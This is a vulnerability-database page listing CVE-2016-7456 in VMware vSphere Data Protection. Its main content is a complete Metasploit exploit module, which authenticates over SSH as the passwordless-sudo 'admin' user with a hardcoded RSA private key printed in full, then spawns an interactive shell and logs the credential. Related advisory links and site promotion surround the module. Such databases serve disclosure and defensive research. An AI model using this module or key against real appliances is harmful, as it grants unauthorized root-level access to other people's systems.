Vulners
Lucene search
VMware VDP Known SSH Key Exploit
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | CVE-2016-7456 | 29 May 201815:50 | – | circl |
 | VMware vSphere Data Protection Authentication Bypass Vulnerability | 22 Dec 201600:00 | – | cnvd |
 | CVE-2016-7456 | 29 Dec 201609:02 | – | cve |
 | CVE-2016-7456 | 29 Dec 201609:02 | – | cvelist |
 | VMware VDP Known SSH Key | 3 Jan 201708:36 | – | metasploit |
 | CVE-2016-7456 | 29 Dec 201609:59 | – | nvd |
 | VMware vSphere Data Protection (VDP) updates address SSH Key-Based authentication issue (VMSA-2016-0024, admin_key) - Active Check | 28 Dec 201600:00 | – | openvas |
| VMware vSphere Data Protection (VDP) updates address SSH Key-Based authentication issue (VMSA-2016-0024, dpnid) - Active Check | 28 Dec 201600:00 | – | openvas |
 | CVE-2016-7456 | 29 Dec 201609:59 | – | osv |
 | VMware VDP Known SSH Key | 22 Aug 201700:00 | – | packetstorm |
10
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'net/ssh'
require 'net/ssh/command_stream'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Auxiliary::Report
include Msf::Auxiliary::CommandShell
include Msf::Exploit::Remote::SSH
def initialize(info = {})
super(update_info(info, {
'Name' => 'VMware VDP Known SSH Key',
'Description' => %q{
VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password.
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Targets' => [ [ "Universal", {} ] ],
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find',
},
},
'Author' => ['phroxvs'],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2016-7456' ],
[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ],
],
'DisclosureDate' => "Dec 20 2016",
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'DefaultTarget' => 0
}))
register_options(
[
# Since we don't include Tcp, we have to register this manually
Opt::RHOST(),
Opt::RPORT(22)
], self.class
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end
# helper methods that normally come from Tcp
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
def do_login()
factory = Rex::Socket::SSHFactory.new(framework,self, datastore['Proxies'])
opt_hash = {
auth_methods: ['publickey'],
port: rport,
key_data: [ key_data ],
use_agent: false,
config: false,
proxy: factory,
non_interactive: true
}
opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
begin
ssh_socket = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh_socket = Net::SSH.start(rhost, 'admin', opt_hash)
end
rescue Rex::ConnectionError
return
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
return
rescue ::Timeout::Error
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
return
rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:#{rport} SSH - Failed authentication"
rescue Net::SSH::Exception => e
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
return
end
if ssh_socket
# Create a new session from the socket, then dump it.
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
self.sockets.delete(ssh_socket.transport.socket)
return conn
else
return false
end
end
def exploit
conn = do_login()
if conn
print_good "Successful login"
service_data = {
address: rhost,
port: rport,
protocol: 'tcp',
service_name: 'ssh',
workspace_id: myworkspace_id,
}
credential_data = {
username: 'admin',
private_type: :ssh_key,
private_data: key_data,
origin_type: :service,
module_fullname: fullname,
}.merge(service_data)
core = create_credential(credential_data)
login_data = {
core: core,
last_attempted: Time.now,
}.merge(service_data)
create_credential_login(login_data)
handler(conn.lsock)
end
end
def key_data
<<EOF
-----BEGIN RSA PRIVATE KEY-----
MIICWQIBAAKBgQCx/XgSpdlvoy1fABui75RYQFTRGPdkHBolTNIAeA91aPfnAr2X
/PuZR/DiHMCYcn6/8A5Jn75YOD3OL0mumJJR1uQ4pyhY+MSptiMYxhvDLIiRRo16
9jewWCSH/7jqWH8NhImpVxt5SjWtKhQInTdPkG1dCj8oSn87bt8fKvLcVQIBIwKB
gFuJq3dN+suzAWQOryCYeC1i6cqfICTbQKV39vjtScdajh8IuUbZ4Hq3SK7M9VW3
Od8NvjR+Ch691qSNWRf2saWS5MHiaYGF3xWwZokbJWJWmxlQ+Di9QAyRkjDIuMCR
Sj/vvCa6kWzZlSZWOyNbs38XkWoKXqVYwtnyXrINpZJTAkEA2p0ZrCKQTWBKt7aT
Rvx/8xnoYu9hSXIG1k11ql0HZdRpmveuZe64Gl6oJtgBZMXNdvAds+gvGTVCSfBO
c2ne0wJBANBt3t84oicWJpkzXnUBPOZdheKfAK6QO7weXiRmbILTJ5drPdu8pmxR
c1uQJgYitaSNKglJmz2WNOoaPZz/7zcCQBj8Au8Z5Jsg8pinJsZIvippXGMUCx5W
LKrHBiIZQqyNTeXTKd/DgsEvY6yq+NhRHsvDq5+IP+Wfr83vk+/u16MCQE1qozz3
xzMW2yL10qB8zXoivLNCX1bH26xFyzIXaiH2qE4vJZrCabM0MilSzEtr+lMP3GnZ
gs27cr1aNCRfD7UCQHOXGagsD/ijMGNcWPBQOY3foHzxozoBLGmysAmVz3vX6uyr
Y7oq9O5vDxwpMOAZ9JYTFuzEoWWg16L6SnNVYU4=
-----END RSA PRIVATE KEY-----
EOF
end
end
# 0day.today [2018-04-09] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Aug 2017 00:00Current
9High risk
Vulners AI Score9
EPSS0.82117